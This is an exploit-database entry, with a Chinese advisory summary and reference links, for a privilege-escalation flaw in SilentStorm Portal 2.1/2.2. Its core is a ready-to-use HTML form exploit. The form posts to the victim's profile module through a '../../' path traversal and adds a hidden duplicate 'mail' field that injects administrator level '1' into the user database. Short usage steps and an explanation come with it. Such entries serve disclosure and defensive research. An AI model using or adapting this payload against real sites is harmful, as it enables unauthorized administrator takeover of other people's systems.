https://www.exploit-db.com/exploits/565
http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-200412-717

SilentStormPortal2.1和2.2版本的profile.php存在漏洞。远程攻击者通过设置邮件参数为1即管理员值提升特权。

Demonstration:

Register a user account then login and run the exploit.html

---exploit.html----
<form method="post" action="http://www.victim.com/index.php?module=../../profile">
<input type="text" name="mail" value="any mail com"><br>
<input type="hidden" name="mail" value="<~>1<~>">
<input type="submit" name="post" value="Get Admin!">
</form>
---/exploit.html---

That's All!
What Happened?
The 3rd line of exploit.html injected Administrator level "1" into the database file.
( 1: Administrator,2: is Normal User. )

# milw0rm.com [2004-09-30]

来源:XF
名称:silent-storm-gain-admin(17555)
链接:http://xforce.iss.net/xforce/xfdb/17555
来源:BID
名称:11284
链接:http://www.securityfocus.com/bid/11284
来源:SECUNIA
名称:12704
链接:http://secunia.com/advisories/12704
来源:BUGTRAQ
名称:20040930MultipleVulnerabilitiesinSilentStormPortal
链接:http://marc.theaimsgroup.com/?l=bugtraq&m;=109655763808924&w;=2
来源:SECTRACK
名称:1011470
链接:http://securitytracker.com/id?1011470